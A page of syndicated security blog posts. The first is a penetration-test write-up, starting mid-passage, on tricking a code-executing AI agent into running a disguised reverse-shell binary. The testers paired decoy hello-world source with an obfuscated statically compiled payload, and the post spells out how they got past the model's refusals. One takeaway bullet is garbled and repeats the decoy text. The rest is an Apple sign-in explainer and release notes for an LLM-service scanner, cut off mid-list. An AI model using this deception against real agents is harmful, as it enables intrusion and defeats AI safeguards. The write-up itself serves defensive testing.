It was more than happy to create <strong>and run</strong> a simple test script. This is worth noting for similar-style engagements. LLMs are trained to be helpful, and “Hello World” scripts are some of the most common within their training data. That makes this a reliable foot-in-the-door when testing agents with code execution.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-46de128 e-con-full e-flex e-con e-parent" data-id="46de128" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-023513d elementor-widget elementor-widget-image" data-id="023513d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="398" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp" class="attachment-full size-full wp-image-10913" alt="Terminal window showing a user request to create a hello world bash script, with status showing 'Bash Script Executed Successfully" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-300x98.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-1024x333.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-768x250.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a7276b7 e-con-full e-flex e-con e-parent" data-id="a7276b7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b693558 elementor-widget elementor-widget-text-editor" data-id="b693558" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>More importantly, while it wouldn’t create anything it considered dangerous, it was perfectly willing to <strong>modify</strong> existing files. Change a file extension or make something executable, all fine. </p> <p>Using the application’s file upload feature you could upload text, images, or csv files, and they’d land in the sandbox. Combined with the agent’s willingness to rename and chmod, this was effectively arbitrary file upload.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9b069a1 e-con-full e-flex e-con e-parent" data-id="9b069a1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-67341f4 elementor-widget elementor-widget-image" data-id="67341f4" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1414" height="277" src="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp" class="attachment-full size-full wp-image-10914" alt="Two chat messages in dark interface. First asks to fix filetype of env_check2.txt and move to cwd. Second confirms task." srcset="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp 1414w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-1024x201.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-768x150.webp 768w" sizes="auto, (max-width: 1414px) 100vw, 1414px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-22eaa52 e-con-full e-flex e-con e-parent" data-id="22eaa52" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-038e023 elementor-widget elementor-widget-text-editor" data-id="038e023" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <h3><strong>Hitting a Wall</strong></h3> <p>Getting code execution should have been straightforward from there – just upload a script and have the agent execute it – but it wasn’t. Opus 4.5 is genuinely good at catching malicious payloads, and it blocked everything we threw at it:</p> <ul> <li>Obfuscated/encoded scripts would get decoded and blocked (or rejected outright citing an inability to verify safety).</li> <li>A wrapper script that runs everything in a directory failed, as it understood the context and inspected each script individually first.</li> <li>Swapping a benign script for a malicious one after building trust didn’t work because it re-read the file before every execution (and the architecture prevented races).</li> </ul> <p>The model had a clear policy: if it couldn’t understand what something did, it wouldn’t run it. And if it could understand it and it looked dangerous, it wouldn’t run it either. We needed something that Opus 4.5 <strong>thought</strong> it understood and <strong>believed</strong> was harmless.</p> <h3><strong>The Trick</strong></h3> <p>The answer came from the “Hello World” observation from earlier. The agent trusted simple programs, and it trusted its own ability to read C code and verify what a binary does. But what if the source code doesn’t actually match the binary?</p> <p>We created two separate programs. The first was legitimate C source code for a hello world program that also calls system(“date”), giving a plausible reason for a system() call to exist in the binary.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e2eaa69 e-con-full e-flex e-con e-parent" data-id="e2eaa69" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-147333b elementor-widget elementor-widget-image" data-id="147333b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1151" height="387" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp" class="attachment-full size-full wp-image-10915" alt="C code editor showing hello_world.c file with main function containing printf Hello World, system date command, and return 0" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp 1151w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-1024x344.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-768x258.webp 768w" sizes="auto, (max-width: 1151px) 100vw, 1151px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cc9dabb e-con-full e-flex e-con e-parent" data-id="cc9dabb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-198d3a9 elementor-widget elementor-widget-text-editor" data-id="198d3a9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The second was the actual payload binary. A statically compiled ELF that downloads and executes a shell script from our server, while also running the same commands as the decoy. We statically compiled it so the binary would be large enough (~600KB) that Claude couldn’t easily analyze it. We also performed a basic XOR against the payload to make it harder to decode.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f96d11 e-con-full e-flex e-con e-parent" data-id="9f96d11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5c68bb elementor-widget elementor-widget-image" data-id="a5c68bb" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1638" height="646" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp" class="attachment-full size-full wp-image-10916" alt="C code editor showing malicious program with encoded payload array, XOR decoding loop, and system() call to execute decoded commands" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp 1638w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-300x118.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1024x404.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-768x303.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1536x606.webp 1536w" sizes="auto, (max-width: 1638px) 100vw, 1638px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ed08f7b e-con-full e-flex e-con e-parent" data-id="ed08f7b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bcf88af elementor-widget elementor-widget-image" data-id="bcf88af" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1000" height="232" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp" class="attachment-full size-full wp-image-10917" alt="Terminal output showing two copied files: hello_world ELF 64-bit executable with magic bytes 7f 45 4c 46, and hello_world.c C source file" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp 1000w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-300x70.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-768x178.webp 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px"><figcaption class="widget-image-caption wp-caption-text">Terminal display confirms successful compilation of a C program into an executable ELF binary, ready for analysis or execution.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7557e01 e-con-full e-flex e-con e-parent" data-id="7557e01" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-abfa907 elementor-widget elementor-widget-image" data-id="abfa907" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1216" height="158" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp" class="attachment-full size-full wp-image-10918" alt="Terminal screenshot showing 'nc -l 13339' command and 'id' command output displaying uid=1001(appuser) gid=1001(appuser) groups=1001(appuser)" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp 1216w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-300x39.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-1024x133.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-768x100.webp 768w" sizes="auto, (max-width: 1216px) 100vw, 1216px"><figcaption class="widget-image-caption wp-caption-text">Command line interface showing a netcat listener on port 13339 and the id command revealing the current user as ‘appuser’ with UID 1001.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-3c1a07a e-con-full e-flex e-con e-parent" data-id="3c1a07a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3aa94a7 elementor-widget elementor-widget-text-editor" data-id="3aa94a7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The sandbox contained the application’s entire business logic. System prompts, MCP tool definitions, the Dockerfile used to build the environment, and the Node.js server running all the integrations. In short: the crown jewels.</p> <h3><strong>Takeaways</strong></h3> <p>If you’re building or deploying AI agents with code execution capabilities, don’t rely on the model’s judgment as a security control. It can be fooled. Here’s what we recommended to the client:</p> <ul> <li><strong>Restrict executable operations at the OS level:</strong> The sandbox should prevent the agent from setting the execute bit on user-uploaded files or running binaries that weren’t pre-installed in the image.</li> <li><strong>Validate uploaded files by content, not just extension:</strong> Check magic bytes. An ELF binary with a .txt extension should be rejected. Content-type validation should persist through file rename operations.</li> <li><strong>Add tool-level guardrails for dangerous operations:</strong> The first was legitimate C source code for a hello world program. It also calls system(“date”), giving a plausible reason for a system() call to exist in the binary.</li> <li><strong>Lock down network egress:</strong> The sandbox didn’t need total outbound internet connectivity, as it only really interfaced with a couple external APIs. Outbound firewalling, while not a primary control, can greatly hinder post-exploitation activity.</li> </ul> <p>Findings and recommendations like these are part of what we do continuously through our <a href="https://www.praetorian.com/guard/">Guard platform</a>. Guard continuously monitors and tests internet-facing and internally-deployed infrastructure, including AI agents and LLM-powered applications, as they evolve and change over time. Got a new agentic deployment, model version, or MCP tool? Guard picks it up and our operators test it, identifying vulnerabilities just like this.</p> <h2>FAQ</h2> <h3>Why did static compilation matter?</h3> <p>A dynamically linked binary is small enough that the LLM could potentially inspect the raw bytes and identify suspicious library calls like network functions. A statically compiled binary is hundreds of kilobytes of noise, making it effectively opaque to the model.</p> <h3>What is Augustus?</h3> <p>Augustus is Praetorian’s Go-based LLM vulnerability scanner. It tests large language models against a wide range of adversarial attacks and jailbreaks. In this case, we used its methodology to automate the discovery of behavioral weaknesses in the target agent.</p> <h3>Did this affect real customer data?</h3> <p>This was conducted during an authorized penetration test. The sandbox environment was isolated, and we did not access or exfiltrate any customer data. The client has since remediated the vulnerability.</p> <h3>Could this work against other LLM agents?</h3> <p>The core technique exploits a general weakness: LLMs are trained to assist, and “Hello World” scripts are among the most common things they’re asked to produce. Any agent with code execution that treats “simple test script” as a safe category is potentially giving attackers a method of initial access. On top of that, the faked source code trick exploits another general weakness: LLMs will often trust contextual information over direct inspection when the direct inspection is too difficult.</p> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">Which Came First: The System Prompt, or the RCE?</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/which-came-first-the-system-prompt-or-the-rce/" data-a2a-title="Which Came First: The System Prompt, or the RCE?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwhich-came-first-the-system-prompt-or-the-rce%2F&amp;linkname=Which%20Came%20First%3A%20The%20System%20Prompt%2C%20or%20the%20RCE%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/</a> </p>

<h2>The big shift from Apple ID to Apple Account</h2><p>Ever wonder why that little button on your screen suddenly changed its name? It’s not just some marketing guy at apple bored on a Tuesday; it’s a massive shift in how we handle identity for saas.</p><p>Moving from "Apple ID" to <strong>Apple Account</strong> is about killing off legacy baggage. The old name felt like a username for a store, but the new one is a full-on identity layer that works the same whether you're on an iPad or a browser. Apple is rebranding the whole system to be more of a "digital passport" than just a login for buying apps.</p><ul> <li><strong>Unified Trust</strong>: When users see "Apple Account," they associate it with their entire digital life. This boosts "login button" conversion in industries like <strong>finances</strong> where trust is everything.</li> <li><strong>Ecosystem Consistency</strong>: It creates a seamless flow across retail apps and healthcare portals. If a patient logs into a portal using their apple account, the familiarity reduces "drop-off" rates.</li> <li><strong>Brand Maturity</strong>: It signals that Apple is serious about being a primary identity provider, competing directly with google and microsoft.</li> </ul><p>Under the hood, this isn't magic. It’s built on <strong>oauth 2.0</strong> and <strong>openid connect</strong>. One of the coolest features for developers is the <strong>private email relay</strong>, which lets users hide their real address while still letting you send them emails.</p><p><strong>The Flow of Identity Trust</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-1.svg" alt="The Flow of Identity Trust"></p><p>According to <a href="https://developer.apple.com/sign-in-with-apple/">Apple's official documentation</a>, this system uses on-device biometrics like <strong>touch id</strong> and <strong>face id</strong>, so users don't even have to remember a password. This is huge for security professionals trying to kill off phishing.</p><p>Honestly, it’s a relief to see them simplify this. Next, let’s look at how this shift impacts the messy world of corporate offices.</p><h2>Identity management in the enterprise world</h2><p>Most employees are already carrying an iphone in their pocket, and honestly, they're tired of juggling fifteen different work passwords just to check a simple spreadsheet. It's no wonder they keep trying to use their personal accounts for everything—it's just easier.</p><p>The line between "work life" and "home life" is basically gone when it comes to hardware. People trust their face id more than they trust a clunky corporate vpn. When you let someone sign in with their apple account, you aren't just giving them a button; you're giving them a shortcut that they actually understand.</p><p>In healthcare, for instance, a nurse needs to update a patient chart fast without fighting a login screen. In retail, a floor manager using an ipad wants to check inventory between helping customers. If the login is slow, they'll find a workaround—and usually, those workarounds are a security nightmare.</p><p>But here is the catch for the it guys. Managing a bunch of individual apple accounts in a b2b environment is like herding cats. You've got directory synchronization issues and the "orphaned account" problem where an employee leaves but still has access to the saas app because their personal account wasn't unlinked. </p><ul> <li><strong>Directory Mess</strong>: Most enterprise apps rely on active directory or okta, which don't always play nice with consumer-facing identity providers.</li> <li><strong>Security Gaps</strong>: If a user bypasses the official sso to use their apple account, you lose visibility into who is doing what.</li> <li><strong>Provisioning</strong>: Manually adding or removing users from every single tool is a waste of time that nobody has.</li> </ul><p>To fix this, many companies use <strong>Identity Orchestration platforms</strong> or <strong>Auth-as-a-Service</strong> tools. A platform like <strong>SSOJet</strong> comes in handy here. It acts like a bridge, letting users have that easy "apple experience" while keeping the it department happy because everything still flows through the central management system. It's basically the "peace treaty" between employee convenience and enterprise security.</p><p><strong>Diagram: The SaaS Implementation Lifecycle</strong></p><pre><code class="language-mermaid">graph LR A[Employee] --&gt; B{[SSOJet](ssojet.com) Gateway} B --&gt; C[Apple Account Auth] B --&gt; D[Enterprise Directory/Okta] C --&gt; E[SaaS App Access] D --&gt; E </code></pre><p>According to <a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-22-gartner-says-75-percent-of-staff-will-use-personal-mobile-devices-for-work-by-2024">Gartner</a>, about 75% of staff will be using personal devices for work by the end of 2024. This makes it pretty clear that we can't just ignore these personal identity layers anymore. </p><p>So, it's about making things work together rather than fighting the trend. Next, let's talk about the "intelligence" behind these accounts and where things are heading.</p><h2>AI integration and the future of sign-in</h2><p>Imagine if your phone knew you were about to log in before you even moved a finger. With the way ai is going, apple is basically turning your "Apple Account" into a digital brain that handles the heavy lifting of security so you don't have to.</p><p>It's not just about chatbots; it's about how the silicon in your pocket learns your habits. If you usually check your work email at 8 AM from your home wifi, the on-device ai recognizes that pattern. If someone tries to log in from a random city at 3 AM, the system knows something is fishy without even needing a database check.</p><ul> <li><strong>Predictive Security</strong>: The device uses local machine learning to verify "user intent," basically making sure a human actually meant to click that button and it wasn't a pocket-dial or a script.</li> <li><strong>Secure Enclave Magic</strong>: All this ai processing happens right on the chip, not in some vulnerable cloud. Your biometric data never leaves the hardware, which is a huge win for privacy.</li> <li><strong>Contextual friction</strong>: If the ai feels confident it's you, the login is instant. If things look weird, it might trigger an extra verification step automatically.</li> </ul><blockquote> <p>According to <a href="https://www.cybersecurity-insiders.com/portfolio/2024-identity-and-access-management-report/">Cybersecurity Insiders</a>, 80% of data breaches involve compromised passwords, which is why ai-driven, passwordless flows are becoming the gold standard for saas founders.</p> </blockquote><p>For a developer, this means you can stop worrying about complex fraud detection. Here is how you might check if a credential is "likely" coming from a real user session:</p><pre><code class="language-python">def verify_login_intent(session_data): if session_data.is_biometric_verified and session_data.trust_score &gt; 0.9: return "Fast-track access granted" else: return "Trigger MFA challenge" </code></pre><p>It’s honestly wild how much we’re moving away from "what you know" (passwords) to "how you behave." Next up, we should look at the actual technical hurdles you'll hit when building this.</p><h2>SaaS implementation and developer hurdles</h2><p>Setting this up isn't exactly a "walk in the park" once you move past the marketing slides. If you're a developer, you know the real headache starts when you actually have to make the apple account handshake work with your existing backend without breaking everything.</p><p>It’s not just adding a button; it's managing a whole new set of keys and identifiers that apple demands. You can't just wing it like a basic oauth setup.</p><ul> <li><strong>Client Secret Woes</strong>: Unlike other providers where you get a permanent string, apple makes you generate a <strong>JWT</strong> (JSON Web Token) signed with a private key that expires. If your script to rotate these keys fails, your login button goes dead.</li> <li><strong>The "Sub" Problem</strong>: The user identifier (the <code>sub</code> claim) is unique to your developer team. If you're moving an app between accounts or merging companies, mapping those old users to new IDs is a total nightmare.</li> <li><strong>Web vs Native</strong>: Getting the flow to feel "native" on an iPhone while keeping a consistent session on a web browser requires some serious state management heavy lifting.</li> </ul><p>You can't just trust the frontend when it says "yeah, this guy is legit." You gotta decode that identity token on your server. Here is a look at how you might pull that off in node:</p><pre><code class="language-javascript">const jwt = require('jsonwebtoken'); const jwksClient = require('jwks-rsa'); // you gotta fetch apple's public keys first const client = jwksClient({ jwksUri: 'https://appleid.apple.com/auth/keys' }); function verifyAppleToken(token) { const decoded = jwt.decode(token, { complete: true }); // NOTE: This is a simplified example. In production, you need robust // error handling for the jwksClient and asynchronous callback logic. client.getSigningKey(decoded.header.kid, (err, key) =&gt; { if (err) { console.error("Key fetching failed", err); return; } const signingKey = key.publicKey || key.rsaPublicKey; jwt.verify(token, signingKey, { issuer: 'https://appleid.apple.com' }, (err, payload) =&gt; { if (err) console.error("token is trash"); else console.log("user is verified", payload.sub); }); }); } </code></pre><p>Honestly, most teams trip up on the <strong>email relay</strong> service. If a user chooses "Hide My Email," and your database expects a unique primary key based on email, you’re gonna have a bad time when they try to link accounts later.</p><p>As mentioned earlier, using a middle layer can save you from this manual labor, but if you're going DIY, watch those expiration dates on your secrets. Next, let’s wrap up with the big picture for founders.</p><h2>The final verdict for SaaS founders</h2><p>So, is it actually worth the dev time to pivot to apple account? If you’re building a saas app today, the answer is usually a "yes," but don't expect it to be a magic wand that fixes a bad product.</p><p>It really comes down to three things:</p><ul> <li><strong>Conversion wins</strong>: I've seen checkout pages in retail and finance jump by 20% just because users didn't have to type an email. Face id is just faster than a brain.</li> <li><strong>Security debt</strong>: By offloading auth to apple, you’re basically letting their billion-dollar security team handle the pii headaches. It makes your startup look way more "pro" to enterprise buyers.</li> <li><strong>Maintenance trap</strong>: As mentioned earlier, keeping those <strong>JWT tokens</strong> and private keys updated is a chore. If you don't automate it, your login button will break during a holiday weekend.</li> </ul><p>For founders, this isn't just a feature; it's about meeting users where they already live. Whether it's a doctor accessing healthcare records or a manager checking inventory, they want zero friction.</p><p><strong>The User Authentication Journey</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-2.svg" alt="The User Authentication Journey"></p><p>Honestly, just don't overthink the "apple account" rebrand. It's the same tech under the hood, just with a friendlier face. If you value your sleep and your users' data, it's a solid bet.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/quantum-hardened-granular-resource-authorization-policies/" data-a2a-title="Quantum-Hardened Granular Resource Authorization Policies"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fquantum-hardened-granular-resource-authorization-policies%2F&amp;linkname=Quantum-Hardened%20Granular%20Resource%20Authorization%20Policies" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security&amp;#039;s Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies">https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies</a> </p>

<p><strong>TL;DR</strong>: Julius v0.2.0 nearly doubles LLM fingerprinting probe coverage from 33 to 63, adding detection for cloud-managed AI services (AWS Bedrock, Azure OpenAI, Vertex AI), high-performance inference servers (SGLang, TensorRT-LLM, Triton), AI gateways (Portkey, Helicone, Bifrost), and self-hosted RAG platforms (PrivateGPT, RAGFlow, Quivr). This release also hardens the scanner itself with response size limiting and TLS configuration for enterprise environments. Update Julius and scan your network — you almost certainly have AI infrastructure you don’t know about.</p><p>When we shipped the <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">v0.1.1 update</a> back in February, Julius could detect 33 LLM services. That covered the self-hosted basics (Ollama, vLLM, llama.cpp) and a growing list of orchestration tools. But the gap was obvious: we had almost no coverage for cloud-managed AI services, production inference servers, or the AI gateway layer that sits between applications and models.</p><p>That gap is now closed. Julius v0.2.0 ships with <strong>63 probes</strong>, adding 30 new detections in a single release. More importantly, the <em>types</em> of infrastructure we now detect reflect where enterprise AI deployments are actually heading: cloud-managed endpoints, high-throughput inference engines, and the growing ecosystem of proxies and gateways that route traffic between them.</p><h2 class="wp-block-heading" id="5f5e1acf-3d93-47fd-b85c-eca8d7c590f6">What’s new in v0.2.0</h2><h3 class="wp-block-heading" id="0d06d4c8-d49f-4f1e-99f8-4e494e38d0be">Cloud-managed AI services (10 probes)</h3><p>This is the biggest category and the one we’ve been asked about most. Organizations deploying AI through their cloud provider often assume these endpoints are inherently private. They’re not — misconfigured API gateways, exposed proxy layers, and overly permissive network policies can put them on the open internet.</p><ul class="wp-block-list"> <li><strong>AWS Bedrock</strong> — Control plane and runtime detection via <code>/foundation-models</code> and <code>/model/{modelId}/converse</code></li> <li><strong>Azure OpenAI</strong> — Azure-specific OpenAI endpoint detection</li> <li><strong>Google Vertex AI</strong> — Vertex AI prediction and model endpoint detection</li> <li><strong>Databricks Model Serving</strong> — Model serving endpoint detection</li> <li><strong>Fireworks AI, Groq, Modal, Replicate, Together AI</strong> — Managed inference API detection</li> </ul><h3 class="wp-block-heading" id="1e08944b-ff5d-407a-a638-d8bbf1d3f0c7">Self-hosted inference servers (10 probes)</h3><p>These are the workhorses of production AI: high-performance inference engines that teams deploy for throughput, latency, or cost reasons. They tend to run with default configurations and minimal authentication.</p><ul class="wp-block-list"> <li><strong>SGLang</strong> — Detected via its unique <code>/server_info</code> endpoint exposing <code>mem_fraction_static</code> and <code>disaggregation_mode</code> fields</li> <li><strong>TensorRT-LLM</strong> — NVIDIA’s optimized inference runtime</li> <li><strong>Triton Inference Server</strong> — NVIDIA’s multi-framework serving platform</li> <li><strong>BentoML</strong> — ML model serving framework</li> <li><strong>Baseten Truss, DeepSpeed-MII, MLC LLM, Petals, PowerInfer, Ray Serve</strong> — Various self-hosted inference engines</li> </ul><h3 class="wp-block-heading" id="dc3a5015-fc0c-45e0-b1eb-a72a832d78a3">AI gateways and proxies (5 probes)</h3><p>The gateway layer is where organizations route, observe, and control traffic between their applications and LLM providers. An exposed gateway often means access to every model and API key behind it.</p><ul class="wp-block-list"> <li><strong>Portkey AI Gateway</strong> — AI gateway with provider routing and observability</li> <li><strong>Helicone</strong> — LLM observability and proxy platform</li> <li><strong>Bifrost</strong> — Multi-provider AI gateway</li> <li><strong>OmniRoute</strong> — LLM routing gateway</li> <li><strong>TensorZero</strong> — Model gateway with experimentation 